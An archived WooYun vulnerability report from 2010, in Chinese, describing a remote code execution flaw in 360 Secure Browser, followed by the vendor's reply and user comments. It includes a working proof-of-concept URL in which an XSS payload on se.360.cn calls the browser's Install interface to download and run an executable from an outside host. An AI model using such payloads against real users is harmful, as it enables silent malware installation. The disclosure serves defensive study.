破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

360安全浏览器远程代码执行漏洞

编号20
Urlhttp://www.wooyun.org/bug.php?action=view&id=20
漏洞状态厂商已经确认
漏洞标题360安全浏览器远程代码执行漏洞
漏洞类型远程代码执行
厂商奇虎360
白帽子结界师
提交日期2010-07-15 12:24:00
公开日期2010-08-18 16:37:00
修复时间(not set)
确认时间1970-01-01 00:00:00
Confirm Spend-1
漏洞标签设计缺陷/边界绕过
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank17
漏洞简介
360安全浏览器(360SE)是互联网上好用、安全的新一代浏览器,和360安全卫士、360杀毒等软件等产品一同成为360安全中心的系列产品,官方网站在http://se.360.cn。
在360浏览器中存在一个设计上的问题,结合一些其他的漏洞可能导致远程代码执行。
漏洞细节

360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为se.360.cn才可以调用这些接口。
通过在se.360.cn网站中漏洞的查找,通过一个xss可以跨越这个边界,从而直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

POC

http://se.360.cn/v3/guide/guide_start.htm?ver=3.1.0.8&firstcheck=1&1="><iframe name="fuck" src="http://se.360.cn/v3/plugins.htm" onload=alert(fuck.window.eval("Install('ExtWebMail','1.1.0.1013','360邮件通','http://www.wooyun.org/ExtWebmail.zip','3.1.0.8')"))></iframe>
其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

修复方案

1 修复xss(无法解决se.360.cn的其他安全问题)
2 验证程序的来源(无法解决其他接口的问题)

状态信息 2010-07-15: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-18: 细节向公众公开
厂商回复该漏洞已经修复,感谢wooyun对360浏览器的支持。
由于该漏洞需在特定场景下才能被利用,因此危害等级为:中
回应信息危害等级:中漏洞Rank:17 确认时间:2010-07-15 12:24
Showing 1-16 of 16 items.
评论内容评论人点赞数评论时间

浏览器漏洞,高端

白加黑02015-01-26 14:05:00

@lxsec 不是吗 难道我一直误认为是?sorry

saga02014-12-26 09:13:00

跳转回来看大牛的

乐乐、02014-11-17 09:26:00

结界师报告的质量果然值得学习 有种前来朝拜的感觉

abaddon02014-10-30 19:12:00

mark

he1renyagao02014-07-02 10:45:00

不愧是创世人之一( ⊙ o ⊙ )啊!

Stranger02014-01-28 20:24:00

不错,挺有技术含量。

dotey02013-08-12 16:26:00

数据库有问题?怎么显示1970

lxsec02013-07-12 01:28:00

@saga 结界师是剑心?

lxsec02013-05-10 09:46:00

赞赞赞

02013-04-15 14:31:00

@xsser 1970年 时光逆转了 你的洞含金量很高啊!!赞!

FallenAngel02012-07-16 21:47:00

不错~

leehenwu02012-07-13 17:21:00

@imlonghao 亲,bug,忽略吧

xsser02012-06-02 12:00:00

@xsser 日期亮了

imlonghao02012-06-02 11:58:00

厉害~ 学习了!

gainover02012-02-03 15:44:00

剑心的洞就是有质量,单独一处se.360边界检查XSS不足以发,一定要找出更具有价值的利用方式

saga02012-01-24 11:04:00